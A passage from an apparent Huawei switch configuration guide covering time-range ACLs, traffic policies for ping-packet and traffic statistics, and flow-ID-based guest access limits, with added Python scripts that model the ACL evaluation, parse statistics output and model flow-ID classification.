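@dataclass(frozen=True)
class TimeRange:
    """Periodic range such as "time-range worktime 8:00 to 18:00 working-day"."""
    start: time
    end: time
    weekdays: FrozenSet[int]          # 0 = Monday ... 6 = Sunday

    def active(self, at: datetime) -> bool:
        # Assumption: the end time is exclusive, so 18:00:00 is already outside.
        return at.weekday() in self.weekdays and self.start <= at.time() < self.end


WORKTIME = TimeRange(time(8, 0), time(18, 0), frozenset(range(5)))   # Mon-Fri


def wildcard_match(addr: str, net: str, wildcard: str) -> bool:
    """Huawei wildcard mask: a 1 bit means "don't care", a 0 bit must match."""
    a = int(ipaddress.IPv4Address(addr))
    n = int(ipaddress.IPv4Address(net))
    w = int(ipaddress.IPv4Address(wildcard))
    return (a & ~w) == (n & ~w)


@dataclass(frozen=True)
class Rule:
    rule_id: int
    action: str                       # "permit" or "deny"
    source: str
    source_wildcard: str
    destination: Optional[str] = None # None = any destination
    destination_wildcard: str = "0.0.0.0"
    time_range: Optional[TimeRange] = None

    def matches(self, src: str, dst: str, at: datetime) -> bool:
        if self.time_range is not None and not self.time_range.active(at):
            return False              # the rule is shown as Inactive by "display acl"
        if not wildcard_match(src, self.source, self.source_wildcard):
            return False
        if self.destination is None:
            return True
        return wildcard_match(dst, self.destination, self.destination_wildcard)


# ACL 3000 from Step 3, with the rule IDs the device assigned (Step 7 output).
ACL_3000: List[Rule] = [
    Rule(5, "permit", "192.168.2.0", "0.0.0.255",
         "192.168.1.0", "0.0.0.255", WORKTIME),
    Rule(10, "deny", "192.168.2.0", "0.0.0.255", time_range=WORKTIME),
]


def evaluate(acl: List[Rule], src: str, dst: str, at: datetime) -> str:
    """First active matching rule wins: "permit" applies behavior b1, "deny"
    drops the packet, and "no-match" means the packet is not subject to p1 and
    is forwarded normally (how VLAN 20 reaches the Internet outside work hours)."""
    for rule in acl:
        if rule.matches(src, dst, at):
            return rule.action
    return "no-match"


def decide(src: str, dst: str, when_iso: str) -> str:
    """Convenience wrapper: evaluate ACL 3000 at an ISO 8601 timestamp."""
    return evaluate(ACL_3000, src, dst, datetime.fromisoformat(when_iso))


if __name__ == "__main__":
    # 2016-10-26 is a Wednesday and 2016-10-29 a Saturday (constructed test times).
    for src, dst, when in [("192.168.2.5", "192.168.1.20", "2016-10-26T10:00"),
                           ("192.168.2.5", "203.0.113.10", "2016-10-26T10:00"),
                           ("192.168.2.5", "203.0.113.10", "2016-10-26T18:00"),
                           ("192.168.2.5", "203.0.113.10", "2016-10-29T10:00")]:
        print(f"{when} {src} -> {dst}: {decide(src, dst, when)}")
```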

----End

Configuration Files
l Configuration file of the Switch
#
sysname Switch
#
vlan batch 10 20 30 40
#
time-range worktime 08:00 to 18:00 working-day
#
acl number 3000
rule 5 permit ip source 192.168.2.0 0.0.0.255 destination 192.168.1.0
0.0.0.255 time-range worktime
rule 10 deny ip source 192.168.2.0 0.0.0.255 time-range worktime
#
traffic classifier c1 operator and precedence 5
if-match acl 3000
#
traffic behavior b1
permit
#
traffic policy p1 match-order config
classifier c1 behavior b1
#
interface Vlanif10
ip address 192.168.1.1 255.255.255.0
#
interface Vlanif20
ip address 192.168.2.1 255.255.255.0
#
interface Vlanif30
ip address 10.1.20.2 255.255.255.0
#
interface Vlanif40
ip address 10.1.30.2 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 10 20
traffic-policy p1 inbound
#
interface GigabitEthernet1/0/2
port link-type access
port default vlan 30
#
interface GigabitEthernet1/0/3
port link-type access
port default vlan 40
#
ip route-static 0.0.0.0 0.0.0.0 10.1.20.1
ip route-static 0.0.0.0 0.0.0.0 10.1.30.1
#
return

l Configuration file of SwitchA


#
sysname SwitchA
#
vlan batch 10 20
#
interface GigabitEthernet1/0/1
port link-type access
port default vlan 10
#
interface GigabitEthernet1/0/2
port link-type access
port default vlan 20
#
interface GigabitEthernet1/0/3

port link-type trunk
port trunk allow-pass vlan 10 20
#
return

17.9 Example for Configuring a Traffic Policy to Collect Statistics on Ping Packets

Overview
During network fault rectification, devices may fail to ping each other. You can configure the
device to collect statistics on ping packets to narrow the search scope and locate fault points
rapidly.

Ping packets are ICMP packets, so you can define ICMP in an advanced ACL to match ping
packets. When a traffic policy is used to collect statistics on ping packets, an ACL is used to
classify packets and the traffic statistics action is defined for matched packets. The statistics
help locate faults.

l If the numbers of received and forwarded ping packets on a device are the same, ping
packets are forwarded normally and no packet loss occurs. If the number of received
ping packets is larger than the number of forwarded ping packets, packet loss occurs on
the device.
l If the number of sent ping packets is equal to the number of received ping packets
on an interface, ping packets are forwarded normally and no packet loss occurs on the
link of the interface. If the number of sent ping packets is larger than the number of
received ping packets on the interface, packet loss occurs on the link of the interface. In
this case, the remote device needs to be configured to collect packet statistics for fault
location.

Configuration Notes

Table 17-12 Applicable product models and versions

Product   Product Model        Software Version
S12700    S12708 and S12712    V200R005C00, V200R006C00, V200R007C00, V200R007C20, V200R008C00, V200R009C00
          S12704               V200R008C00, V200R009C00

NOTE
To know details about software mappings, see Switch Software Mapping Search.

Networking Requirements
As shown in Figure 17-9, the PC cannot access the server. The device where data flows pass
needs to be configured to collect statistics on ping packets so that the fault point can be
located.

Figure 17-9 Configuring a traffic policy to collect statistics on ping packets

[Figure: PC (10.1.1.1/24, VLAN 10) connects to GE1/0/1 (VLAN 10) of the Switch; GE1/0/2 (VLAN 10) of the Switch connects to the Router, which connects to the Server (10.1.2.10/24).]

Configuration Roadmap
The configuration roadmap is as follows:
1. Create VLANs and configure interfaces to ensure network connectivity.
2. Configure ACLs to match ICMP packets exchanged between the PC and server.
3. Configure traffic classifiers to classify packets based on the ACLs.
4. Configure traffic behaviors and define the traffic statistics action.
5. Configure traffic policies, bind the traffic classifiers and traffic behaviors to the traffic
policies, and apply the traffic policies to inbound and outbound directions of GE1/0/1
and GE1/0/2 of the Switch.

Procedure
Step 1 Create VLANs and configure interfaces.
# Configure the Switch.
<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] vlan 10 //Create VLAN 10.
[Switch-vlan10] quit
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] port link-type access //Set the link type of the interface to access.
[Switch-GigabitEthernet1/0/1] port default vlan 10 //Add the interface to VLAN 10.
[Switch-GigabitEthernet1/0/1] quit
[Switch] interface gigabitethernet 1/0/2
[Switch-GigabitEthernet1/0/2] port link-type access
[Switch-GigabitEthernet1/0/2] port default vlan 10
[Switch-GigabitEthernet1/0/2] quit

# Configure the PC's gateway address 10.1.1.2/24 for the interface of the router connected to
the Switch, and configure the IP address 10.1.2.1/24 for the interface of the router connected
to the server.
Step 2 Configure ACLs.
# Configure ACL rules on the Switch to match ICMP packets exchanged between the PC and
server.
[Switch] acl 3001
[Switch-acl-adv-3001] rule permit icmp source 10.1.1.1 0 destination 10.1.2.10 0 //Configure an ACL rule to permit packets from the PC to the server.
[Switch-acl-adv-3001] quit
[Switch] acl 3002

[Switch-acl-adv-3002] rule permit icmp source 10.1.2.10 0 destination 10.1.1.1 0 //Configure an ACL rule to permit packets from the server to the PC.
[Switch-acl-adv-3002] quit

Step 3 Configure traffic classifiers.


# Configure traffic classifiers on the Switch to classify packets based on the ACL.
[Switch] traffic classifier c1 operator and
[Switch-classifier-c1] if-match acl 3001
[Switch-classifier-c1] quit
[Switch] traffic classifier c2 operator and
[Switch-classifier-c2] if-match acl 3002
[Switch-classifier-c2] quit

Step 4 Configure traffic behaviors.


# Configure traffic behaviors on the Switch and define the traffic statistics action in the traffic
behaviors.
[Switch] traffic behavior b1
[Switch-behavior-b1] statistic enable
[Switch-behavior-b1] quit
[Switch] traffic behavior b2
[Switch-behavior-b2] statistic enable
[Switch-behavior-b2] quit

Step 5 Configure traffic policies and apply the traffic policies to interfaces.
# Create traffic policies p1 and p2 on the Switch, bind the traffic behaviors and traffic
classifiers to the traffic policies, apply the traffic policy p1 to the inbound direction of
GE1/0/1 and outbound direction of GE1/0/2, and apply the traffic policy p2 to the outbound
direction of GE1/0/1 and inbound direction of GE1/0/2.
[Switch] traffic policy p1
[Switch-trafficpolicy-p1] classifier c1 behavior b1
[Switch-trafficpolicy-p1] quit
[Switch] traffic policy p2
[Switch-trafficpolicy-p2] classifier c2 behavior b2
[Switch-trafficpolicy-p2] quit
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] traffic-policy p1 inbound
[Switch-GigabitEthernet1/0/1] traffic-policy p2 outbound
[Switch-GigabitEthernet1/0/1] quit
[Switch] interface gigabitethernet 1/0/2
[Switch-GigabitEthernet1/0/2] traffic-policy p1 outbound
[Switch-GigabitEthernet1/0/2] traffic-policy p2 inbound
[Switch-GigabitEthernet1/0/2] quit

Step 6 Verify the configuration.


# Check the ACL configuration on the Switch.
[Switch] display acl all
Total nonempty ACL number is 2

Advanced ACL 3001, 1 rule


Acl's step is 5
rule 5 permit icmp source 10.1.1.1 0 destination 10.1.2.10 0 (match-counter 0)

Advanced ACL 3002, 1 rule


Acl's step is 5
rule 5 permit icmp source 10.1.2.10 0 destination 10.1.1.1 0 (match-counter 0)

# Check the traffic policy configuration on the Switch.


[Switch] display traffic policy user-defined
User Defined Traffic Policy Information:


Policy: p2
Classifier: c2
Operator: AND
Behavior: b2
Permit
Statistic: enable

Policy: p1
Classifier: c1
Operator: AND
Behavior: b1
Permit
Statistic: enable

Total policy number is 2

# Ping the server from the PC and check the traffic statistics in the inbound and outbound
directions of GE1/0/1 and GE1/0/2 on the Switch. Here, check the traffic statistics in the
inbound direction of GE1/0/1.
[Switch] display traffic policy statistics interface gigabitethernet 1/0/1 inbound

Interface: GigabitEthernet1/0/1
Traffic policy inbound: p1
Rule number: 1
Current status: success
Statistics interval: 300
---------------------------------------------------------------------
Board : 1
---------------------------------------------------------------------
Matched | Packets: 0
| Bytes: 0
| Rate(pps): 0
| Rate(bps): 0
---------------------------------------------------------------------
Passed | Packets: 0
| Bytes: 0
| Rate(pps): 0
| Rate(bps): 0
---------------------------------------------------------------------
Dropped | Packets: 0
| Bytes: 0
| Rate(pps): 0
| Rate(bps): 0
---------------------------------------------------------------------
Filter | Packets: 0
| Bytes: 0
---------------------------------------------------------------------
Car | Packets: 0
| Bytes: 0
---------------------------------------------------------------------

Matched indicates the numbers of packets and bytes matching the traffic classifier, and
Passed indicates the numbers of forwarded packets and bytes matching the traffic classifier.
The following table describes the traffic statistics.


Traffic Statistics on GigabitEthernet1/0/1: display traffic policy statistics interface gigabitethernet 1/0/1 inbound
Traffic Statistics on GigabitEthernet1/0/2: display traffic policy statistics interface gigabitethernet 1/0/2 outbound
Description:
l If the statistics are 0, ping request packets do not reach the Switch.
l If the statistics are consistent and are not 0, ping request packets are forwarded normally.
l If the statistics in the inbound direction of GigabitEthernet1/0/1 are more than the statistics in the outbound direction of GigabitEthernet1/0/2, ping request packets are discarded on the Switch and the Switch is the fault point.

Traffic Statistics on GigabitEthernet1/0/1: display traffic policy statistics interface gigabitethernet 1/0/1 outbound
Traffic Statistics on GigabitEthernet1/0/2: display traffic policy statistics interface gigabitethernet 1/0/2 inbound
Description:
l If the statistics are 0, ping response packets do not reach the Switch.
l If the statistics are consistent and are not 0, ping response packets are forwarded normally.
l If the statistics in the inbound direction of GigabitEthernet1/0/2 are more than the statistics in the outbound direction of GigabitEthernet1/0/1, ping response packets are discarded on the Switch and the Switch is the fault point.

Traffic Statistics on GigabitEthernet1/0/1: display traffic policy statistics interface gigabitethernet 1/0/1 inbound
Traffic Statistics on GigabitEthernet1/0/2: display traffic policy statistics interface gigabitethernet 1/0/2 inbound
Description:
l If the statistics are consistent and are not 0, ping packets are forwarded normally.
l If the statistics in the inbound direction of GigabitEthernet1/0/2 are more than the statistics in the inbound direction of GigabitEthernet1/0/1, ping response packets are discarded on the uplink network of the Switch. The fault needs to be further located.

----End
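As an added illustration that is not part of the Huawei document, the following Python script parses the text of display traffic policy statistics in the format shown above and applies the decision rules of the table to the four counters. The command output used here is constructed with made-up counter values, and the third check (the two inbound counters) is applied as an inequality test.

```python
import re
from typing import Dict


def sample_output(interface: str, direction: str, policy: str,
                  matched: int, passed: int) -> str:
    """Constructed helper: emit text in the layout of
    'display traffic policy statistics interface ...' with made-up values."""
    sep = "-" * 69
    lines = [f"Interface: {interface}", f"Traffic policy {direction}: {policy}",
             "Rule number: 1", "Current status: success",
             "Statistics interval: 300", sep, "Board : 1", sep]
    for name, pkts in (("Matched", matched), ("Passed", passed),
                       ("Dropped", matched - passed)):
        lines += [f"{name} | Packets: {pkts}", f"| Bytes: {pkts * 74}",
                  "| Rate(pps): 0", "| Rate(bps): 0", sep]
    lines += ["Filter | Packets: 0", "| Bytes: 0", sep,
              "Car | Packets: 0", "| Bytes: 0", sep]
    return "\n".join(lines)


def parse_policy_statistics(output: str) -> Dict[str, int]:
    """Return the packet total of every counter row (Matched, Passed,
    Dropped, Filter, Car) found in the command output."""
    counters: Dict[str, int] = {}
    for line in output.splitlines():
        m = re.match(r"^\s*([A-Za-z]+)\s*\|\s*Packets:\s*(\d+)\s*$", line)
        if m:
            counters[m.group(1)] = int(m.group(2))
    return counters


def compare_path(ingress: int, egress: int, what: str) -> str:
    """First two rows of the table: the Matched count where the packets
    enter the Switch against the Matched count where they leave it."""
    if ingress == 0:
        return f"{what} do not reach the Switch"
    if ingress == egress:
        return f"{what} are forwarded normally"
    if ingress > egress:
        return f"{what} are discarded on the Switch; the Switch is the fault point"
    return f"{what}: egress exceeds ingress, recheck the counters"


def locate_ping_fault(ge1_in: str, ge2_out: str,
                      ge1_out: str, ge2_in: str) -> Dict[str, str]:
    """Combine the four command outputs into the verdicts of the table."""
    req_in = parse_policy_statistics(ge1_in)["Matched"]    # PC -> Switch
    req_out = parse_policy_statistics(ge2_out)["Matched"]  # Switch -> Router
    rsp_in = parse_policy_statistics(ge2_in)["Matched"]    # Router -> Switch
    rsp_out = parse_policy_statistics(ge1_out)["Matched"]  # Switch -> PC
    findings = {
        "request": compare_path(req_in, req_out, "ping request packets"),
        "response": compare_path(rsp_in, rsp_out, "ping response packets"),
    }
    # Third row: the two inbound counters. Every request entering on GE1/0/1
    # should produce one response entering on GE1/0/2; a mismatch while both
    # paths through the Switch are intact means the loss lies beyond the
    # Switch, so the remote device has to collect statistics as well.
    if req_in == 0 or rsp_in == 0:
        findings["uplink"] = "no end-to-end exchange observed"
    elif req_in == rsp_in:
        findings["uplink"] = "ping packets are forwarded normally end to end"
    else:
        findings["uplink"] = ("ping packets are lost on the uplink network of "
                              "the Switch; locate the fault further")
    return findings


if __name__ == "__main__":
    # Constructed scenario: the Switch forwards everything it receives, but
    # only 60 of 100 responses come back from the router side.
    out = locate_ping_fault(
        sample_output("GigabitEthernet1/0/1", "inbound", "p1", 100, 100),
        sample_output("GigabitEthernet1/0/2", "outbound", "p1", 100, 100),
        sample_output("GigabitEthernet1/0/1", "outbound", "p2", 60, 60),
        sample_output("GigabitEthernet1/0/2", "inbound", "p2", 60, 60))
    for key, verdict in out.items():
        print(f"{key:8s}: {verdict}")
```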

Configuration Files
Configuration file of the Switch
#
sysname Switch
#
vlan batch 10
#
acl number 3001
rule 5 permit icmp source 10.1.1.1 0 destination 10.1.2.10 0
acl number 3002
rule 5 permit icmp source 10.1.2.10 0 destination 10.1.1.1 0
#
traffic classifier c1 operator and precedence 5
if-match acl 3001
traffic classifier c2 operator and precedence 10
if-match acl 3002
#
traffic behavior b1
permit
statistic enable
traffic behavior b2
permit
statistic enable
#
traffic policy p1 match-order config
classifier c1 behavior b1
traffic policy p2 match-order config
classifier c2 behavior b2
#
interface GigabitEthernet1/0/1
port link-type access
port default vlan 10
traffic-policy p1 inbound
traffic-policy p2 outbound
#
interface GigabitEthernet1/0/2
port link-type access
port default vlan 10
traffic-policy p2 inbound
traffic-policy p1 outbound
#
return

17.10 Example for Configuring a Traffic Policy to Implement Traffic Statistics
Overview
After MQC is used to implement traffic statistics, the device collects statistics on packets and
bytes of packets matching traffic classification rules. The statistics on forwarded and
discarded packets after a traffic policy is applied help you check whether the traffic policy is
correctly applied and locate faults.
Interface-based traffic statistics in the inbound and outbound directions can be configured
simultaneously or separately. The device collects traffic statistics in the inbound and outbound
directions separately.

Configuration Notes

Table 17-13 Applicable product models and versions

Product   Product Model        Software Version
S12700    S12708 and S12712    V200R005C00, V200R006C00, V200R007C00, V200R007C20, V200R008C00, V200R009C00
          S12704               V200R008C00, V200R009C00

NOTE
To know details about software mappings, see Switch Software Mapping Search.

Networking Requirements
As shown in Figure 17-10, the company has two departments that belong to VLAN 10 and
VLAN 20, respectively. The network administrator wants to determine whether the host at
192.168.2.200/24 in VLAN 20 can access the server at 192.168.1.100/24 in VLAN 10.

Figure 17-10 Configuring a traffic policy to implement traffic statistics

[Figure: VLAN 10 (192.168.1.0/24) and VLAN 20 (192.168.2.0/24) -- SwitchA (GE1/0/1, GE1/0/2; uplink GE0/0/3) -- GE1/0/1 Switch GE1/0/2 -- Router (10.1.20.1/24) -- Network]


Device    Interface              VLAN                  Layer 3 Interface          IP Address
SwitchA   GigabitEthernet1/0/1   VLAN 10               -                          -
          GigabitEthernet1/0/2   VLAN 20               -                          -
          GigabitEthernet1/0/3   VLAN 10 and VLAN 20   -                          -
Switch    GigabitEthernet1/0/1   VLAN 10 and VLAN 20   VLANIF 10 and VLANIF 20    VLANIF 10: 192.168.1.1/24, VLANIF 20: 192.168.2.1/24
          GigabitEthernet1/0/2   VLAN 30               VLANIF 30                  10.1.20.2/24

Configuration Roadmap
The configuration roadmap is as follows:
1. Create VLANs, and configure interfaces and a routing protocol to implement
interworking.
2. Configure an ACL on the Switch to match specified traffic.
3. Configure a traffic classifier on the Switch to classify packets based on the ACL.
4. Configure a traffic behavior on the Switch to collect statistics on matched packets.
5. Configure a traffic policy on the Switch, bind the traffic policy to the traffic classifier
and traffic behavior, and apply the traffic policy to GE1/0/1 connected to SwitchA in the
inbound direction.

Procedure
Step 1 Create VLANs and configure interfaces.
# Configure the switch.
<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] vlan batch 10 20 30 //Create VLAN 10, VLAN 20, and VLAN 30.
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] port link-type trunk //Set the link type of the interface to trunk.
[Switch-GigabitEthernet1/0/1] port trunk allow-pass vlan 10 20 //Add the interface to VLAN 10 and VLAN 20.
[Switch-GigabitEthernet1/0/1] quit
[Switch] interface gigabitethernet 1/0/2
[Switch-GigabitEthernet1/0/2] port link-type access //Set the link type of the interface to access.
[Switch-GigabitEthernet1/0/2] port default vlan 30 //Add the interface to VLAN 30.
[Switch-GigabitEthernet1/0/2] quit

[Switch] interface vlanif 10 //Create a VLANIF interface.
[Switch-Vlanif10] ip address 192.168.1.1 255.255.255.0 //Configure an IP address for the VLANIF interface. The IP address is the gateway address of network segment 192.168.1.0/24.
[Switch-Vlanif10] quit
[Switch] interface vlanif 20
[Switch-Vlanif20] ip address 192.168.2.1 255.255.255.0
[Switch-Vlanif20] quit
[Switch] interface vlanif 30 //Create a VLANIF interface.
[Switch-Vlanif30] ip address 10.1.20.2 255.255.255.0 //Configure an IP address for the VLANIF interface to connect to the router.
[Switch-Vlanif30] quit
[Switch] ip route-static 0.0.0.0 0 10.1.20.1 //Configure a static route pointing to the external network to implement interworking.

# Configure SwitchA.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan batch 10 20 //Create VLAN 10 and VLAN 20.
[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] port link-type access //Set the link type of the interface to access.
[SwitchA-GigabitEthernet1/0/1] port default vlan 10 //Add the interface to VLAN 10.
[SwitchA-GigabitEthernet1/0/1] quit
[SwitchA] interface gigabitethernet 1/0/2
[SwitchA-GigabitEthernet1/0/2] port link-type access
[SwitchA-GigabitEthernet1/0/2] port default vlan 20
[SwitchA-GigabitEthernet1/0/2] quit
[SwitchA] interface gigabitethernet 1/0/3
[SwitchA-GigabitEthernet1/0/3] port link-type trunk //Set the link type of the interface to trunk.
[SwitchA-GigabitEthernet1/0/3] port trunk allow-pass vlan 10 20 //Add the interface to VLAN 10 and VLAN 20.
[SwitchA-GigabitEthernet1/0/3] quit

# Configure the router.


Configure the IP address of 10.1.20.1/24 for the interface of the router connected to the
switch.
Step 2 Configure an ACL.
# Configure an ACL rule on the Switch to match traffic with the source IP address of
192.168.2.200 and destination IP address of 192.168.1.100.
[Switch] acl 3000
[Switch-acl-adv-3000] rule permit ip source 192.168.2.200 0.0.0.0 destination 192.168.1.100 0.0.0.0
[Switch-acl-adv-3000] quit

Step 3 Configure a traffic classifier.


# Configure a traffic classifier on the Switch to classify packets based on the ACL.
[Switch] traffic classifier c1 operator and
[Switch-classifier-c1] if-match acl 3000
[Switch-classifier-c1] quit

Step 4 Configure a traffic behavior.


# Configure a traffic behavior on the Switch and define the traffic statistics action in the
traffic behavior.
[Switch] traffic behavior b1
[Switch-behavior-b1] statistic enable
[Switch-behavior-b1] quit


Step 5 Configure a traffic policy and apply the traffic policy to an interface.

# Create a traffic policy on the Switch, bind the traffic behavior and traffic classifier to the
traffic policy, and apply the traffic policy to the inbound direction of GE1/0/1 connected to
SwitchA.
[Switch] traffic policy p1
[Switch-trafficpolicy-p1] classifier c1 behavior b1
[Switch-trafficpolicy-p1] quit
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] traffic-policy p1 inbound
[Switch-GigabitEthernet1/0/1] quit

Step 6 Verify the configuration.

# Check the ACL configuration.


[Switch] display acl 3000
Advanced ACL 3000, 1 rule
Acl's step is 5
rule 5 permit ip source 192.168.2.200 0 destination 192.168.1.100 0 (match-counter 0)

# Check the traffic policy configuration.


[Switch] display traffic policy user-defined p1
User Defined Traffic Policy Information:
Policy: p1
Classifier: c1
Operator: AND
Behavior: b1
Permit
Statistic: enable

# Check the traffic statistics.


[Switch] display traffic policy statistics interface gigabitethernet 1/0/1 inbound

Interface: GigabitEthernet1/0/1
Traffic policy inbound: p1
Rule number: 1
Current status: success
Statistics interval: 300
---------------------------------------------------------------------
Board : 1
---------------------------------------------------------------------
Matched | Packets: 0
| Bytes: 0
| Rate(pps): 0
| Rate(bps): 0
---------------------------------------------------------------------
Passed | Packets: 0
| Bytes: 0
| Rate(pps): 0
| Rate(bps): 0
---------------------------------------------------------------------
Dropped | Packets: 0
| Bytes: 0
| Rate(pps): 0
| Rate(bps): 0
---------------------------------------------------------------------
Filter | Packets: 0
| Bytes: 0
---------------------------------------------------------------------
Car | Packets: 0
| Bytes: 0


---------------------------------------------------------------------

Matched indicates the numbers of packets and bytes matching the traffic classifier, and
Passed indicates the numbers of forwarded packets and bytes matching the traffic classifier. If
the values of Matched and Passed are not 0, the host at 192.168.2.200 in VLAN 20 has
accessed the server at 192.168.1.100 in VLAN 10.

----End

Configuration Files
l Configuration file of the Switch
#
sysname Switch
#
vlan batch 10 20 30
#
acl number 3000
rule 5 permit ip source 192.168.2.200 0 destination 192.168.1.100 0
#
traffic classifier c1 operator and precedence 5
if-match acl 3000
#
traffic behavior b1
permit
statistic enable
#
traffic policy p1 match-order config
classifier c1 behavior b1
#
interface Vlanif10
ip address 192.168.1.1 255.255.255.0
#
interface Vlanif20
ip address 192.168.2.1 255.255.255.0
#
interface Vlanif30
ip address 10.1.20.2 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 10 20
traffic-policy p1 inbound
#
interface GigabitEthernet1/0/2
port link-type access
port default vlan 30
#
ip route-static 0.0.0.0 0.0.0.0 10.1.20.1
#
return

l Configuration file of SwitchA


#
sysname SwitchA
#
vlan batch 10 20
#
interface GigabitEthernet1/0/1
port link-type access
port default vlan 10
#
interface GigabitEthernet1/0/2
port link-type access
port default vlan 20
#


interface GigabitEthernet1/0/3
port link-type trunk
port trunk allow-pass vlan 10 20
#
return

17.11 Example for Limiting Access Based on the Flow ID

Overview of the Flow ID


When the same traffic classification rules need to be configured, and the same action needs to
be taken for matching packets, on different interfaces or in different VLANs, ACL resources
can be saved by configuring the device to classify packets based on ACL rules once, re-mark the
flow ID of each type of packet, and then classify packets based on the flow ID and process all
packets with the same flow ID in the same manner.
Assume that M ACLs are configured on the device to distinguish services, that each ACL
contains N rules, that traffic classifiers classify packets based on these ACL rules, and that
the traffic policy containing the ACL-based classifiers is applied to X interfaces. If flow ID
re-marking and flow-ID-based matching are not configured, applying the traffic policy
occupies M*N*X ACL resources. If they are configured, applying the traffic policy occupies
only M*(N+X) ACL resources, that is, M*N entries for the ACL rules plus M*X entries for the
flow ID matches on the X interfaces.
In this example, the device is configured to re-mark flow IDs of packets matching ACL rules,
to classify packets based on flow IDs, and to permit or deny packets matching rules to limit
the access.
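An added Python model of the two-stage classification described above, not Huawei code: the ACLs and flow IDs are those of this example, the permit/deny decisions of the second stage are assumed from the networking requirements (the procedure on this page stops before those commands), and the ACL-entry count generalizes the M*N*X and M*(N+X) formulas to ACLs with unequal rule counts.

```python
from dataclasses import dataclass, replace
from ipaddress import ip_address, ip_network
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class Packet:
    in_interface: str
    dst_ip: str
    dst_port: int
    flow_id: int = 0      # 0: not yet re-marked by the global policy


# Stage 1 input: the advanced ACLs of this example, one (destination
# network, TCP destination port) pair per "rule permit tcp ..." line.
ACLS: Dict[str, List[Tuple[str, int]]] = {
    "non-access-file":    [("10.1.5.0/24", 20), ("10.1.5.0/24", 21)],
    "non-access-finance": [("10.1.7.0/24", 20), ("10.1.7.0/24", 21)],
    "access-file":        [("10.1.6.0/24", 20), ("10.1.6.0/24", 21)],
    "access-internet":    [("0.0.0.0/0", 80)],   # any destination, port 80
}
# "remark flow-id N" of the traffic behavior bound to each classifier.
REMARK: Dict[str, int] = {"non-access-file": 1, "non-access-finance": 2,
                          "access-file": 3, "access-internet": 4}
# Stage 2: action per flow ID. Assumed from the networking requirements
# (guests may not reach the confidential and financial servers); the
# page's procedure stops before these commands are shown.
ACCESS: Dict[int, str] = {1: "deny", 2: "deny", 3: "permit", 4: "permit"}
GUEST_INTERFACES = ("GigabitEthernet1/0/1", "GigabitEthernet1/0/2",
                    "GigabitEthernet1/0/3")


def acl_matches(rules: List[Tuple[str, int]], pkt: Packet) -> bool:
    return any(ip_address(pkt.dst_ip) in ip_network(net) and pkt.dst_port == port
               for net, port in rules)


def global_policy_remark(pkt: Packet) -> Packet:
    """Stage 1: policy flow-id, applied globally inbound. With match-order
    config the first classifier whose ACL matches wins."""
    for name, rules in ACLS.items():
        if acl_matches(rules, pkt):
            return replace(pkt, flow_id=REMARK[name])
    return pkt


def interface_policy(pkt: Packet) -> str:
    """Stage 2: the policy on the guest-area interfaces matches only the
    flow ID (if-match flow-id N); other interfaces carry no such policy."""
    if pkt.in_interface not in GUEST_INTERFACES:
        return "permit"
    return ACCESS.get(pkt.flow_id, "permit")   # unclassified traffic is not limited


def process(pkt: Packet) -> str:
    return interface_policy(global_policy_remark(pkt))


def entries_without_flow_id(rule_counts: List[int], interfaces: int) -> int:
    """ACL entries when the ACL-based policy itself is applied to every
    interface: every rule once per interface (M*N*X for equal N)."""
    return sum(rule_counts) * interfaces


def entries_with_flow_id(rule_counts: List[int], interfaces: int) -> int:
    """ACL entries with flow ID re-marking: the rules once, globally, plus
    one flow ID match per classifier per interface (M*(N+X) for equal N)."""
    return sum(rule_counts) + len(rule_counts) * interfaces


if __name__ == "__main__":
    # Constructed packets from the office building 2 guest area (GE1/0/2).
    for ip, port in (("10.1.5.9", 21), ("10.1.6.9", 20),
                     ("10.1.7.9", 21), ("198.51.100.7", 80)):
        print(f"guest -> {ip}:{port}: {process(Packet('GigabitEthernet1/0/2', ip, port))}")
    counts = [len(rules) for rules in ACLS.values()]
    print("entries without flow IDs:", entries_without_flow_id(counts, len(GUEST_INTERFACES)))
    print("entries with flow IDs:   ", entries_with_flow_id(counts, len(GUEST_INTERFACES)))
```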

Configuration Notes

Table 17-14 Applicable product models and versions

Product   Product Model        Software Version
S12700    S12708 and S12712    V200R008C00, V200R009C00
          S12704               V200R008C00, V200R009C00

NOTE
To know details about software mappings, see Switch Software Mapping Search.

Networking Requirements
As shown in Figure 17-11, the Switch connects to SwitchA, and SwitchA connects to the
router. Guests can connect to the enterprise network in guest areas of office buildings 1, 2, and
3. Guests can access the public file server and the Internet, but cannot access the confidential
file server and financial department server.


Figure 17-11 Networking of traffic policing

[Figure: Guest areas of office buildings 1, 2 and 3 (10.1.1.0/24, 10.1.2.0/24, 10.1.3.0/24) connect to Switch GE1/0/1, GE1/0/2 and GE1/0/3; Switch GE1/0/4 -- GE1/0/1 SwitchA; SwitchA GE1/0/2 -- Confidential file server (10.1.5.0/24), GE1/0/3 -- External file server (10.1.6.0/24), GE1/0/4 -- Financial department server (10.1.7.0/24), GE1/0/5 -- Router -- Internet; enterprise campus network; traffic direction from the guest areas towards the servers and the Internet]

Device    Interface              VLAN      Layer 3 Interface   IP Address
Switch    GigabitEthernet1/0/1   VLAN 10   VLANIF 10           10.1.1.1/24
          GigabitEthernet1/0/2   VLAN 20   VLANIF 20           10.1.2.1/24
          GigabitEthernet1/0/3   VLAN 30   VLANIF 30           10.1.3.1/24
          GigabitEthernet1/0/4   VLAN 40   VLANIF 40           10.1.4.1/24
SwitchA   GigabitEthernet1/0/1   VLAN 40   VLANIF 40           10.1.4.2/24
          GigabitEthernet1/0/2   VLAN 50   VLANIF 50           10.1.5.1/24
          GigabitEthernet1/0/3   VLAN 60   VLANIF 60           10.1.6.1/24
          GigabitEthernet1/0/4   VLAN 70   VLANIF 70           10.1.7.1/24
          GigabitEthernet1/0/5   VLAN 80   VLANIF 80           10.1.8.1/24


Configuration Roadmap
The configuration roadmap is as follows:
1. Create VLANs, and configure interfaces and a routing protocol so that the enterprise can
